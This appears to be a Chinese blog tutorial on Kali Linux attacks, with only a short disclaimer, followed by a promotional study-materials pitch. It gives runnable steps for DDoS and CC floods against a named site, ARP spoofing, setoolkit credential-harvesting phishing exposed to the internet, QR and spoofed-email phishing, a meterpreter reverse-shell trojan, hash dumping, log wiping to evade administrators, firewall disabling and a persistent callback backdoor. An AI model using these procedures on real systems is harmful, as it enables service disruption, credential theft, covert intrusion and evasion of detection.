当前位置:   article > 正文

Kali常见攻击手段_kali攻击_kali ddos攻击工具

kali ddos攻击工具

前言

Kali常见攻击手段

注意:仅用于教程和科普,切勿做违法之事,否则后果自负

1 网络攻击手段

请正确使用DDos和CC攻击,不要用来做违反当地法律法规的事情,否则后果自负

  • 使用之前kali需要能够上网
    参考:kali安装
1.1 DDos攻击
  1. 打开命令行,下载对应ddos数据包
git clone https://github.com/Andysun06/ddos

  • 1
  • 2
  1. 进入数据包对应的文件夹(区分大小写)
cd ddos

  • 1
  • 2
  1. 执行脚本
    本文用于演示的kali是2020年版本,用python执行ddos-p2.py,输入命令:
python ddos-p2.py

  • 1
  • 2

在这里插入图片描述

然后会出现如下界面:
在这里插入图片描述

然后输入攻击对象的IP(本教程以我的网站为例)

再打开一个命令行窗口:

ping + 域名
# 得到ip

  • 1
  • 2
  • 3

在这里插入图片描述

  1. 配置参数
  • ip: 攻击对象
  • Attack Port即攻击端口,一般服务器默认为80(更多内容请百度)
  • Attack Speed即攻击速度,数值越大越快,最大不能超过1000
    在这里插入图片描述
  1. 发起攻击

按下回车,出现如下界面表示攻击成功:
在这里插入图片描述

1.2 CC攻击
  • DDoS攻击的一种类型
  • CC (ChallengeCollapsar,挑战黑洞)攻击是DDoS攻击的一种类型,使用代理服务器向受害服务器发送大量貌似合法的请求
  1. 以root身份打开命令行
  2. 输入命令
ab -n 参数1 -c 参数2 网站地址

  • 1
  • 2

参数一是并发数(请求的用户量)
参数二是发送总量(请求的总次数)
(有兴趣的可以在百度上另外学习)
参数1,参数2和网站地址由自己设置,这里以 1000,1000,http://bjvcrrn.nat.ipyingshe.com/bbs/ 为例:
出现如下界面表示攻击成功:
在这里插入图片描述

DDos与CC攻击区别:
1,CC攻击(流量不大,真实IP)
通常是应用层攻击,攻击对象是网页,涉及的协议主要是HTTP,HTTPS,消耗的是服务器的CPU资源(通过请求大量调用CPU的资源,例如查询数据库)
2,DDOS攻击(流量很大,伪造IP)
通常是网络层和传输层,攻击对象是IP,涉及协议主要是IP,UDP和TCP,通常消耗的是网络带宽

1.3 ARP欺骗

首先,ARP欺骗需要用到dsniff数据包(arpspoof 是 dsniff 的一个附属工具,所以我们需要安装的是 dsniff),安装命令如下:

  1. 安装dsniff
apt-get install dsniff -y

  • 1
  • 2
  1. 确定网卡名称和地址
ifconfig

  • 1
  • 2

在这里插入图片描述

  1. 嗅探ip设备

嗅探你所在WLAN下所有设备的IP地址,命令如下:

fping -g 本机IP地址/24

  • 1
  • 2

例如我的IP是192.168.145.98,命令就是fping -g 192.168.145.98/24

在这里插入图片描述
我的另一台设备就出现在了这里:192.168.145.26,是一台PC(centos)

  1. 发起攻击

发起攻击之前,先查看我192.168.145.26(目标主机)的网速

在这里插入图片描述

结果:基本耗时在50ms左右

输入命令发起攻击:

arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址

  • 1
  • 2

网卡名称的查看上文已经提过,我以我的网卡为例,名称是eth0,攻击目标就是我的另一台PC,IP是192.168.145.26

在这里插入图片描述

因为我用的是虚拟机,并且我PC的网关配置的是192.168.145.2,因此我攻击命令如下(一般来说网关配置为xxx.xxx.xxx.1,也就是ip最后一位改为1):

arpspoof -i eth0 -t 192.168.145.26 192.168.145.2

  • 1
  • 2

按下回车发起攻击,出现如下页面表示攻击成功:

在这里插入图片描述

  1. 查看效果
    现在,我的另一台PC基本上无法上网了,这就说明我们的ARP欺骗成功了。

在这里插入图片描述

在这里插入图片描述
如果你想停止攻击,就按下Ctrl+Z,攻击就停止了。

2 社会工程学攻击(setoolkit)

2.1 搭建钓鱼网站

钓鱼网站是黑客常用的用于盗取目标用户名与账号的方式,今天主要介绍setoolkit来制作钓鱼网站

setoolkit是kali下的社会工程学工具集。

①进入setoolkit

命令行输入:

setoolkit

  • 1
  • 2

在这里插入图片描述

②选择社会工程学攻击 - 网络攻击 - 钓鱼网站

在这里插入图片描述

社会工程学攻击
快速追踪测试
第三方模块
升级软件
升级配置
帮助123456

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 在上图中,我们选择1,社会工程学攻击,进入到下图页面
    在这里插入图片描述
鱼叉式网络攻击
网页攻击
传染媒介式
建立payload和listener
邮件群发攻击
Arduino基础攻击
无线接入点攻击
二维码攻击
Powershell攻击
第三反方模块12345678910

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 上图中输入2,选择社会工程学中的网络攻击,进入到下图页面:
    在这里插入图片描述
Java applet攻击
Metasploit浏览器攻击
钓鱼网站攻击
标签钓鱼攻击
网站jacking攻击
多种网站攻击
全屏幕攻击1234567

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 上图中选择3,进入钓鱼网站攻击,进入下图页面:

在这里插入图片描述

网站模板
站点克隆
用自己的网站123

  • 1
  • 2
  • 3
  • 4

如果选择网站模板的话,会有几个默认的登陆界面的模板

如果想克隆指定的页面的话,就选择2站点克隆,当然,这个功能虽然强大,但是有的网站是无法克隆的,如果无法克隆,就选择3,自己制作一样的网站去钓鱼。这里我详细讲一下站点克隆的方法。

登录页面模板:

在这里插入图片描述

  • 输入2,选择google登录模板:
    在这里插入图片描述

  • kali监听效果:
    在这里插入图片描述

③站点克隆

选择完2之后,需要我们输入一些信息

在这里插入图片描述

  • 上图中选择2,选择网站克隆,进入如下页面:
    在这里插入图片描述
这个是我们克隆完之后的网站返回的ip地址,一般就写虚拟机的IP地址
# 此处我的虚拟机ip为192.168.145.98

  • 1
  • 2
  • 3

这个是我们克隆完之后的网站返回的ip地址,一般就写虚拟机的IP地址,然后我们需要填写想要克隆的网站的url

回车之后,显示如下信息就代表克隆完成

在这里插入图片描述

④kali获取用户名、密码

在这里插入图片描述

我们将账号和密码都设为admin,点击登陆,发现有跳转到了真正的页面,也不会返回账号信息错误的界面,同时,kali也将我们输入的信息截获了,并在终端显示

⑤结合内网穿透实现公网可访问

本次使用DVWA的登录页面试验
内网穿透工具选择花生壳

  • 到官网上下载花生壳并安装
    花生壳官网

    • 新增映射

      在这里插入图片描述

    • 使用https映射认证

    该服务需要花费6元

    • 配置映射

    内网主机ip填写kali的ip即可

    在这里插入图片描述

所以,这里就只需要我们将kali的IP以及端口(80)填入即可映射到外网了

但是前面也说过http协议是收费的,6块,但是能用很久个人觉得倒是不贵。

好,那现在就让我们去到最后一步!用Custom Import和花生壳去 钓 鱼 ~~

⑥公网钓鱼

注意:本文仅供学习之用,严禁做违法之事!

资料:
一、DVWA:
链接: https://pan.baidu.com/s/1URPTFthsmPU3_F54Tsyvgg?pwd=12wx 提取码: 12wx 复制这段内容后打开百度网盘手机App,操作更方便哦 
--来自百度网盘超级会员v5的分享
  • 1
  • 2
  • 3
  • 4
  1. 将dvwa文件拖至/root目录下,如果拖拽有问题上文有请自行查阅
    在这里插入图片描述

  2. 开启setoolkit

①. 打开终端输入setoolkit
②. 选择1社会工程学攻击
③. 选择2,网站攻击
④,选择3,钓鱼网站
⑤,选择3,用户导入【默认,回车即可】
⑥,选择导入的路径【/root/dvwa】
⑦,选择2,导入整个文件夹
⑧,配置内网穿透
⑨,通过域名访问,查看kali监听结果

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10

选择3用户导入之后,会出现如下页面,如果是默认,直接回车即可
如果默认就直接回车。(如果选择域名,就需要将域名解析到该主机) 我们默认直接回车

在这里插入图片描述

在这里插入图片描述

下面我们选择2,导入整个文件夹

在这里插入图片描述

  1. 配置内网穿透服务
    在这里插入图片描述

  2. 测试结果

输入网址访问:https://****.****.fun/

  • 1
  • 2

在这里插入图片描述

⑦克隆网站命令全过程

如果想要实现公网钓鱼,参照即可

1. setoolkit
2. 输入1
3. 输入2
4. 输入3
5. 输入2
6. 输入kali虚拟机ip(或自己搭建的kali的ip)
7. 输入克隆的网站地址
8. 通过kali的ip访问克隆网站地址

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 原网站:
    在这里插入图片描述

  • 克隆网站:

    在这里插入图片描述

大家也可以看到,钓鱼网站的制作其实并不难,所以我们平常在访问一些常用的有账号登陆的地方一定要看清楚url,防止被钓鱼。

2.2 二维码

SET 工具包中使用QR Code Attack模块发起二维码攻击,使被欺骗用户扫描你的二维码进入一个伪装钓鱼网站。有人肯定会认为那这个软件没啥用,但是请问正常情况下,给你一个二维码和一个未知网址,你更愿意相信哪一个?答案当然是二维码。

以下是对应命令:

1. setoolkit
2. 输入1,社会工程学攻击
3. 输入8,二维码攻击
4. 输入对应网站url(以合天为例:www.hetianlab.com)

  • 1
  • 2
  • 3
  • 4
  • 5

在这里插入图片描述

二维码生成路径(默认):/root/.set/reports/
结果:
在这里插入图片描述

然而使用手机微信扫描出来的结果如下:

在这里插入图片描述

需要使用手机UC浏览器扫描才可以跳转到相应网站。

以上 Kali 显得太垃圾了……推荐一个在线二维码生成平台(草料二维码生成),可生成在微信即可扫描并跳转的二维码并且种类丰富,大可为所欲为。

生成的二维码在手机微信扫描的效果如下:

在这里插入图片描述

【小结】以上的攻击演示告诉我们几点:

  1. 不要轻易打开一个安全性未知的网站链接或者去扫描二维码,并且傻乎乎地输入自己的账号密码等敏感信息,你看到的网站不一定是真的(现实中攻击者会绑定公网IP、公网域名来以假乱真);
  2. 同时请务必留意,不要轻易连接安全性未知的WIFI,因为一旦你进入攻击者设定的WIFI,攻击者完全可以利用局域网内部的DNS欺骗攻击,使得你访问www.baidu.com这样的域名都能跳转到他指定的钓鱼网站!
2.3 钓鱼邮件

当攻击者制作了钓鱼网站、木马程序后,便会想法设法将其传给受害者,而常见的传播方式便是钓鱼网站了。安全意识较差的用户在收到钓鱼邮件后点击邮件中的钓鱼链接、下载附件中的木马程序,便可能遭受攻击!

工具简述

Swaks 是一款类似于“瑞士军刀”的工具,之所以这么说是因为它在SMTP邮件协议领域有非常非常广泛的应用,同时对于一名信息安全高级工程师来说也是一个不错的利用工具!它通常被用来伪造邮件,进行钓鱼、社工等操作。

Swaks基本用法:

1、swaks --to test@qq.com 测试邮箱的连通性;

2、参数说明(这里只是简单的罗列了一些,至于更加具体的内容可以使用–help进行查看了解):

--from  test@qq.com     //发件人邮箱;
--ehlo   qq.com      //伪造邮件ehlo头,即是发件人邮箱的域名。提供身份认证
--body  "http://www.baidu.com"    //引号中的内容即为邮件正文;
--header  "Subject:hello"   //邮件头信息,subject为邮件标题
--data   ./Desktop/email.txt    //将正常源邮件的内容保存成TXT文件,再作为正常邮件发送;

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

kali内置了swaks,查看版本swaks -v

  1. 创建一个临时邮箱,用于接收邮件
    创建地址:https://www.linshi-email.com/

  2. 发起攻击

伪造一份来自 360hr 的邮件,收件人为vkshnixybj@iubridge.com,内容为:“Congratulations on your 360 interview. Please click on the link below to enter our employee information page. https://fishing.com/test.php”,如下图所示:

swaks --to vkshnixybj@iubridge.com --from hr@baidu.cn --ehlo baidu.cn --body "this is your Offer, please click on the link below to enter our employee information page. https://baidu.com"


  • 1
  • 2
  • 3
  1. 查看临时邮箱,此时可以收到邮件消息
    在这里插入图片描述
“===”:swaks输出的信息行 
“*“:swaks中产生的错误 
” ->”:发送到目标的预期行(无错误) 
“<- “:服务器的预期回复(无错误) 
“<**”:服务器返回的错误信息

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

拓展:发送邮件的时候添加上附件--attach

swaks --to qeolcz47062@chacuo.net --from hr@360.cn --ehlo 360.cn --body "this is your offer.please open the attach" --attach offer.txt

  • 1
  • 2

offer.txt需要在当前目录下
在这里插入图片描述

点开邮件:
在这里插入图片描述

但是,QQ邮箱和网易云邮箱暂不可送达,应该是腾讯、网易设定的安全机制的原因!在此提醒遇到可疑邮件要查看源邮件,判断发信人IP是否为可信任的IP,不然一个贸然的操作有时候将可能导致自己被钓鱼甚至攻击!

2.4 远程木马

SET 同时集成了木马生成工具,可以生成木马并调用MSF框架对远程主机进行控制。

2.4.1 生成木马并上传到靶机
1. set
2. 选择1,社会工程学攻击
3. 选择4,创建攻击载荷和监听器
4. 选择2,攻击模式选择reverse_tcp meterpreter
5. 输入ip地址(监听的主机ip,kali的ip地址)和端口(随机,只要不被占用即可)

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

在这里插入图片描述

默认生成木马地址:root/.set

在这里插入图片描述

将木马上传到靶机:
在这里插入图片描述

2.4.2 执行木马,操控主机

双击执行木马,查看结果
在这里插入图片描述

激活 Meterpreter 会话,获得 Shell 后即可操控 Win 7 靶机,如下图所示:

# 选择会话中的第一个目标
sessions -i 1

  • 1
  • 2
  • 3

在这里插入图片描述

  • 操纵主机

可输入help命令查看 Meterpreter 支持的所有攻击命令和描述

在这里插入图片描述

截图效果:

在这里插入图片描述

  • 执行getsystem进行提权攻击
    在这里插入图片描述

  • 获取密码(windows的密码其实就是藏在一个目录下的hash值)

执行命令hashdump,尝试获取系统所有账户的密码的hash值,发现失败。没关系,可以执行Meterpreter 提供的脚本:

在这里插入图片描述

  • 远程监控win7
run vnc

  • 1
  • 2

在这里插入图片描述

进一步的攻击还可以执行background将当前会话转移到后台执行,达到后台进程切换的目的。同时可以执行migrate 命令迁移会话进程到指定的进程pid,达到隐藏控制会话的进程,此时原来的进程是看不到的目的(通过ps命令可以看到受害机的哪些进程)

2.4.3 日志清除

为了不暴露攻击者的痕迹行为,需要清除系统事件

  1. 先打开 Windows 事件查看器,查看清理之前的日志记录
win + r,输入:eventvwr

  • 1
  • 2

在这里插入图片描述

  1. 在 Meterpreter 执行命令 clearev 命令,对靶机的日志进行清除,如下图所示:

在这里插入图片描述

但该命令存在的弊端的是,没法指定清除哪一部分的日志,一次性清除容易引起系统管理员的注意。

注意:如果不小心ctrl+Z退出了控制台,可以通过如下命令恢复

# jobs 查看当前被挂起的进程对应的号码
jobs

# 将任务调至前台继续运行
fg %jobnumber(是命令编号,不是进程号)

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

如果不小心退出了msf的会话,重新打开setoolkit,设置相同的ip和端口即可恢复

2.4.4 创建后门

当成功获取目标系统的访问权限后,需要寻找方法来恢复与目标主机的连接,而无需再进入目标系统。如果目标用户破坏了该连接,例如重新启动计算机,此时使用后门将允许自动重新与目标系统建立连接。为了后续渗透方便,所以需要创建一个后门,这样即使连接被中断也不会影响工作。

  1. 创建持久后门之前,先查看下它的帮助文件,如下所示:
run persistence -h

  • 1
  • 2

在这里插入图片描述

  1. 执行命令创建一个持久后门,输出的信息将显示创建后门的一个过程。Kali 将在目标系统中创建了一个持久脚本
    (保存在C:\Users\thinkpad\AppData\Local\Temp\naBffRVEO.vbs)并篡改注册表,如下所示:
run persistence -X -i 5 -p 9000 -r 192.168.145.98(kali渗透机的ip)

  • 1
  • 2

在这里插入图片描述

  1. 查看 Win 7 靶机的注册表和系统文件

在这里插入图片描述

在这里插入图片描述

  1. 为了验证后门是否可利用,关闭当前攻击会话,重启 Win 7 虚拟机
    在这里插入图片描述

此时在 Kali 虚拟机重新开启一个终端,运行 MSF 框架,监听 Win 7 虚拟机是否重启后能自动上线获得攻击会话:
在这里插入图片描述

至此,后门植入成功!以后只要Win 7系统开机便会自动运行后门脚本,攻击者可以随时入侵!除非受害主机的管理员发现后删除了注册表相应的键值和系统中植入的后门脚本。此时即使 Win 7 靶机中的远控木马文件 payload.exe 被管理员删除也没关系,只不过功能受限

2.4.5 常用命令
运行虚拟桌面:run vnc

获取hash值:run hashdump

查看文件夹:ls

将会话置于后台:background
 
查看运行时间:idletime
 
查看当前用户身份:getuid
 
查看当前用户具备的权限:getprivs
 
查看当前进程PID:getpid
 
查看目标机系统信息:sysinfo
 
查看正在运行的进程:ps
 
搜寻、拷贝、上传文件(需要拥有system权限,可以利用getsystem、MS16-032漏洞进行提权)
    (1)搜寻c盘内所有以txt为后缀的文件:search -f *.txt -d c:\
    (2)拷贝文件至kali内:download c:\1.txt /root
    (3)上传文件至win7:upload /home/zidian/msfadmin.txt c:\
 
重启/关机:reboot / shutdown -h now
 
进入cmd:shell

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29

获取cmd之后的常用命令:

查看当前用户:whoami
 
添加用户和对应密码:net user [username] [password] /add
 
查看当前计算机中的详细情况:systeminfo
 
关闭防火墙:netsh adcfirewall set allprofiles state off
 
查看当前计算机中网络连接通信情况:netstat -ano

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10

msf常用命令

参考:https://cloud.tencent.com/developer/article/1808932
https://www.freebuf.com/articles/network/317596.html

参考文章:
https://blog.csdn.net/a_n_d_y_s_u_n__/article/details/118528019

—END—

这里我整合并且整理成了一份【282G】的网络安全/红客技术从零基础入门到进阶资料包,需要的小伙伴文末免费领取哦,无偿分享!!!

学习计划安排

学习路线图大纲总览


我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴文末免费领取哦,无偿分享!!!

【一一帮助网络安全学习,以下所有资源免费领取一一】
①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

接下来我将给各位同学划分一张学习计划表!

学习计划

那么问题又来了,作为萌新小白,我应该先学什么,再学什么?
既然你都问的这么直白了,我就告诉你,零基础应该从什么开始学起:

阶段一:初级网络安全工程师

接下来我将给大家安排一个为期1个月的网络安全初级计划,当你学完后,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;其中,如果你等保模块学的好,还可以从事等保工程师。

在这里插入图片描述

综合薪资区间6k~15k

1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(1周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(1周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(1周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)


那么,到此为止,已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗?

阶段二:中级or高级网络安全工程师(看自己能力)

综合薪资区间15k~30k

7、脚本编程学习(4周)
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力。

零基础入门的同学,我建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习
搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP,IDE强烈推荐Sublime;

Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,没必要看完

用Python编写漏洞的exp,然后写一个简单的网络爬虫

PHP基本语法学习并书写一个简单的博客系统

熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选)

了解Bootstrap的布局或者CSS。

阶段三:顶级网络安全工程师

这部分内容对于咱们零基础的同学来说还太过遥远了,由于篇幅问题就不展开细说了,我给大家贴一个学习路线。感兴趣的童鞋可以自行研究一下哦,当然你也可以点击这里加我与我一起互相探讨、交流、咨询哦。

资料领取

上述这份完整版的网络安全学习资料已经上传网盘,朋友们如果需要可以微信扫描下方二维码 即可自动领取↓↓↓
或者

点此链接】领取

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/人工智能uu/article/detail/896183
推荐阅读
相关标签
  

闽ICP备14008679号